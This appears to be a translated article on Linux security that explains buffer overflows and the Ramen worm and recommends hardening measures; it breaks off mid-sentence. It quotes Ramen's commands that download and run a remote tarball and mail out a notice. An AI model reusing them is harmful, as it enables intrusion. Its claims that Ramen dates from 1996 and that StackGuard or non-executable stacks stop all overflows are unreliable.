Linux security overview

Because Linux is an open-source, free operating system, it is welcomed by more and more users. As Linux has spread in China, it has always been regarded as a rival to Microsoft's Windows, because it is not only secure, stable and cost-effective but also rarely troubled by viruses. However, as more servers, workstations and PCs run Linux, virus writers have begun to attack the system as well. The Ramen virus, discovered in 1996, was the first Linux virus. If Linux viruses were at first only a concept, the discovery of Ramen started to cause real worry. Although many people think that, strictly speaking, Ramen cannot be called a virus, it surprised many users who had placed enormous confidence in Linux security.
  
From 1996 to the present there have been only a handful of new Linux viruses. This shows that Linux is a robust operating system with an intrinsic resistance to viruses. Of course, excellent design is not the only reason Linux is rarely attacked by viruses: in fact, all operating systems (including DOS and Windows) were rarely hit by viruses when they were new. However, as Raimond Genes, European president of Trend Micro's anti-virus department, said: "Of course we will see more and more Windows attacks, but Linux will also become a target, because it is becoming more and more popular. It is a stable operating system, but it is not a completely secure system." As for Linux, Ramen, the first Linux virus in the world, has already appeared. After obtaining the relevant information and samples of the virus, we found that, strictly speaking, Ramen cannot be called a virus. In fact, it is an old "buffer overflow" attack program of a kind that has long existed in the UNIX/Linux world; almost all UNIX/Linux versions have had such problems. The first attack of this type, the Morris worm, appeared more than a decade ago, and such attacks have persisted to this day. Buffer overflow attacks against Windows 98/NT are also very common.
  
The principle of a buffer overflow is this: copying an overly long string into a buffer with limited space overwrites the adjacent storage, which makes the program fail. Because automatic variables are stored on the stack, a buffer overflow also overwrites the function's return address stored on the stack, so control cannot return normally from the overflowed function (the return address is usually an invalid address). In this case the system generally reports a "core dump" or "segmentation fault". More seriously, if the buffer is overwritten with a carefully designed sequence of machine instructions, the overflow can change the return address and point it at that sequence, thereby altering the normal flow of the program. Such carefully designed code generally aims to start "/bin/sh", which is why it is called "shell code". Through this overflow an attacker obtains a shell, and that is all; however, if the program is a setuid-root program, a root shell is obtained. Control of the machine is then easy, and everything that follows is straightforward.
  
Let us return to Ramen. It first scans hosts on the network, uses two common vulnerabilities to enter a system and obtain root permissions, then copies itself from the source host and continues scanning other servers on the Internet. On Red Hat 6.2, if the attack succeeds, it does the following:
  
mkdir /usr/src/.poop; cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz; tar -xvf ramen.tar; ./start.sh
echo Eat Your Ramen! | mail -s TOADDR -c gb31337@hotmail.com gb31337@yahoo.com
  
Obviously, Ramen is just an automated buffer overflow program, and such programs are quite common. Buffer overflow is currently a very common form of attack; hacker websites publish new vulnerabilities in various systems almost daily. However, this attack method is not unavoidable.
  
So we still need to pay attention to Linux security measures.
  
1. Install separate partitions for the different parts of the Linux file system and mount the key partitions read-only; this greatly improves file-system security. It also involves the append-only and immutable attributes of Linux's ext2 file system.
  
● Partitioning. The Linux file system can be divided into several major partitions, each configured and mounted separately. In general, at least /, /usr/local, /var and /home should be separate partitions. /usr can be mounted read-only and treated as unmodifiable: if any file in /usr changes, the system should immediately raise a security alarm. Of course, this does not include changes in /usr made deliberately by the user.
  
/lib, /boot and /sbin are installed and configured in the same way. At installation time they should be mounted read-only wherever possible, and any modification of their files, directories or attributes should trigger a system alarm.
  
Of course, not every major partition can be read-only. Some, such as /var, cannot be read-only by their very nature; they should, however, not be allowed execute permission.
  
● Extended ext2 attributes. The append-only and immutable file attributes of the ext2 file system can further raise the security level. Immutable and append-only are two of the extended attribute flags of the ext2 file system.
  
A file marked immutable cannot be modified at all, not even by the root user. A file marked append-only can be modified, but content can only be added at its end, and this restriction applies even to root.
  
Use the chattr command to set these attributes on a file and the lsattr command to view them; run man chattr to learn more about ext2 file attributes. These two attributes are useful for detecting an intruder's attempts to install a backdoor in an existing file. For safety, once such activity is detected it should be blocked immediately and an alarm raised.
  
If your critical file systems are mounted read-only and their files are marked immutable, an intruder must remount the file system to delete these immutable files, and that immediately generates an alarm; this greatly reduces the chances of a successful illegal intrusion.
  
● Protecting log files. The immutable and append-only attributes are particularly useful in combination with log files and log backups. The system administrator should set the active log file to append-only. When the log is rotated, the new log backup file should be set to immutable and the new active log file to append-only. This usually requires adding a few control commands to the log rotation script.
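The rotation step just described, as an added example that is not part of the original article: a POSIX sh script that rotates an append-only active log, makes the finished log immutable and creates a new append-only active log. The path /var/log/messages, the APPLY switch and the run helper are this example's own choices; with APPLY unset it only prints the commands it would execute.

```sh
#!/bin/sh
# Added example (not from the original article): rotate an active log that is
# protected with the ext2 append-only attribute. The finished log becomes
# immutable, the new active log becomes append-only, as the article proposes.
# The log path and the APPLY switch are this example's own assumptions.
#
# The chattr/lsattr calls need root on an ext2/ext3/ext4 file system, so they
# are only printed unless APPLY=1 is set, which lets the sequence be reviewed.
APPLY="${APPLY:-0}"

run() {
    if [ "$APPLY" = "1" ]; then
        "$@"
    else
        echo "$*"
    fi
}

# rotate_log ACTIVE_LOG SUFFIX: ACTIVE_LOG is moved to ACTIVE_LOG.SUFFIX.
rotate_log() {
    active="$1"
    backup="$1.$2"

    # An append-only file cannot be renamed or deleted, so clear 'a' first;
    # this is the one moment the rotation script itself needs the flag off.
    run chattr -a "$active"
    run mv "$active" "$backup"
    # The finished log may no longer change at all, not even by root.
    run chattr +i "$backup"
    # Start a fresh active log and allow appends only.
    run touch "$active"
    run chmod 0640 "$active"
    run chattr +a "$active"
}

# lsattr lists the flags; 'a' and 'i' must show up for the two files.
show_attrs() {
    run lsattr "$@"
}

stamp="$(date +%Y%m%d)"
rotate_log /var/log/messages "$stamp"
show_attrs /var/log/messages "/var/log/messages.$stamp"
```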
  
2. Back up the entire system after installation. Later, the integrity of the system can be verified against this backup, which reveals whether system files have been tampered with. If system files have been damaged, the backup can be used to restore the system to a normal state.
  
● CD-ROM backup. The best backup medium for the system at present is the CD-ROM disc; the system can be compared against the disc's contents regularly to verify that its integrity has not been damaged. If the security requirements are high, the disc can be made bootable and the verification made part of the system startup process. Then, as long as the system can be started from the disc, it is known not to have been damaged.
  
If read-only partitions were created, they can be reloaded from the disc image regularly. Even a partition that cannot be mounted read-only in the way /boot, /lib and /sbin are can still be checked against the disc image, or even loaded from another secure image at startup.
  
● Other backup methods. Although many files in /etc change frequently, many of them can still be stored on a CD for system integrity verification. Other files that are not modified often can be backed up to another medium (such as tape) or compressed into a read-only directory. In this way, additional integrity checks can be carried out on top of the verification against the CD image.
  
Since the vast majority of operating systems now ship on CD, it is very convenient to create an emergency boot or verification CD-ROM, and this is a very effective and practical verification method.
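One way to carry out the comparison against a known-good image described in this point, and to raise the alarm on changed /usr files called for under point 1, as an added example that is not the article's own code: a POSIX sh checksum manifest built from a tree and later verified against the live tree. The function names and the use of sha256sum from GNU coreutils are this example's own assumptions; in real use the manifest and the checking script are written to the CD-ROM.

```sh
#!/bin/sh
# Added example (not from the original article): checksum manifest of a tree
# that should not change (/usr, /lib, /sbin, parts of /etc) and a verifier that
# compares the live tree against it, the way the article proposes checking the
# system against its CD-ROM image. The manifest and this script must themselves
# be kept on read-only media for the check to mean anything.

# make_baseline TREE MANIFEST: one "sha256  ./path" line per regular file.
make_baseline() {
    tree="$1"; manifest="$2"
    (cd "$tree" && find . -type f -exec sha256sum {} + | LC_ALL=C sort -k 2) > "$manifest"
}

# verify_baseline TREE MANIFEST: exit status 0 only when every listed file is
# unchanged and nothing was added; prints each changed, missing or new path.
verify_baseline() {
    tree="$1"; status=0
    # sha256sum -c is run after cd into the tree, so resolve the manifest first.
    manifest="$(cd "$(dirname "$2")" && pwd)/$(basename "$2")"

    # Changed or missing files: every line that sha256sum -c does not mark OK.
    bad="$(cd "$tree" && sha256sum -c "$manifest" 2>/dev/null | grep -v ': OK$' || true)"
    if [ -n "$bad" ]; then
        echo "$bad"; status=1
    fi

    # New files: present now but absent from the manifest. A backdoor dropped
    # into a directory that should never gain files shows up here.
    listed="$(mktemp)"; present="$(mktemp)"
    awk '{ sub(/^[^ ]+  /, ""); print }' "$manifest" | LC_ALL=C sort > "$listed"
    (cd "$tree" && find . -type f) | LC_ALL=C sort > "$present"
    new="$(comm -13 "$listed" "$present")"
    rm -f "$listed" "$present"
    if [ -n "$new" ]; then
        printf '%s\n' "$new" | sed 's/^/NEW: /'; status=1
    fi
    return "$status"
}

# Usage (as root; the manifest is then burned to the CD-ROM):
#   make_baseline /usr /mnt/cdrom/usr.sha256
#   verify_baseline /usr /mnt/cdrom/usr.sha256 || echo "ALARM: /usr has changed"
```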
  
3. Improve the internal security mechanisms of the system. Improving the internals of the Linux operating system to prevent buffer overflow attacks, which are extremely destructive and the hardest to prevent, requires an experienced and skilled system administrator, but it is necessary for many Linux systems with high security requirements.
  
● Solar Designer's Linux security patch. Solar Designer's security patch for the 2.0 kernel provides a non-executable stack, which reduces the threat of buffer overflows and thus greatly improves the security of the whole system.
  
  
A buffer overflow attack is quite difficult to carry out, because the intruder must determine when a potential overflow will occur and where it will appear in memory. It is also very difficult to prevent: the system administrator would have to remove every condition under which an overflow can occur. For this reason many people, even Linus Torvalds, consider this security patch very important, because it prevents all attacks that use buffer overflow. Note, however, that these patches also break some programs and libraries that depend on an executable stack, which brings new challenges for the system administrator.
  
Non-executable stack patches have been distributed on many security mailing lists (such as securedistros@nl.linux.org) and are easy for users to download.
  
● StackGuard. StackGuard is a powerful security patch tool: key applications can be recompiled and linked with a version of gcc patched by StackGuard.
  
StackGuard adds a stack check at compile time to prevent stack-based buffer overflow attacks. Although this slightly reduces system performance, StackGuard remains a very useful tool for specific applications with high security requirements.
  
There is now a Linux distribution built with StackGuard, which makes StackGuard easier to use. Although StackGuard reduces system performance by about 10 to 20%, it can prevent buffer overflow attacks entirely.
  
● New access control features. Linux kernel version 2.3 is attempting to implement access control lists in the file system, which add finer-grained access control on top of the original three categories (owner, group and other).
  
In Linux kernel versions 2.2 and 2.3, new access control features are being developed that will eventually affect the current ext2 file attributes. Compared with the traditional ext2 file system, they provide more precise security control. With these new features, applications will be able to access certain system resources without superuser permission (such as initial integration).
  
● Rule-set-based access control. The Linux community is currently developing a rule-set-based access control